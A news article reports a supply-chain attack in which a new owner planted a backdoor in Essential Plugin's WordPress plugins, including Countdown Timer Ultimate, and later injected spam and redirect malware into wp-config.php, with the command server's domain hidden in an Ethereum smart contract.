WordPress plugins can expand functionality, but they are also a “double-edged sword.” When malicious code manages to infiltrate a plugin ecosystem with a large user base, the consequences spread rapidly.
Recently, explains the Sapo portal, a popular plugin brand was turned into a weapon to download and spread malicious software. This new supply chain attack was revealed by Austin Ginder, a programmer and founder of Anchor, who discovered that the threat was already affecting several clients through a method designed to secure communications with the “command and control” server.
Ginder’s investigation began when a client of his company received an alert from the WordPress.org security team. The warning indicated that the Countdown Timer Ultimate (CTU) plugin contained dangerous code, including a backdoor that could be exploited by third parties to gain unauthorized access to any website that had installed it.
This plugin was part of a series developed by Essential Plugin (EP), an India-based brand that was recently acquired by an unknown group operating in the cryptocurrency and online gaming sectors.
The change in ownership that led to this attack
Shortly after acquiring the approximately 30 plugins created by EP, the new owner added the vulnerability in question during the very first code submission. Although this backdoor was inserted eight months ago, the first active malware injection was not detected until April 6.
The injected code was present in a PHP block within the wp-config.php file, one of WordPress’s core configuration components. The malware’s objective was to collect spam links, force URL redirects, and automatically generate fraudulent pages.
The mechanism responsible for checking new instructions from the criminals used an unusual technique: the command server domain was hidden within a smart contract on the Ethereum network.
This allowed the attacker to update the contract with a new domain at any time, rendering attempts to disable the server virtually useless.
After being notified, the WordPress.org team removed all plugins associated with the EP brand. Ginder has since released a list of extensions confirmed to contain this malicious code, allowing administrators to check if their sites are at risk.
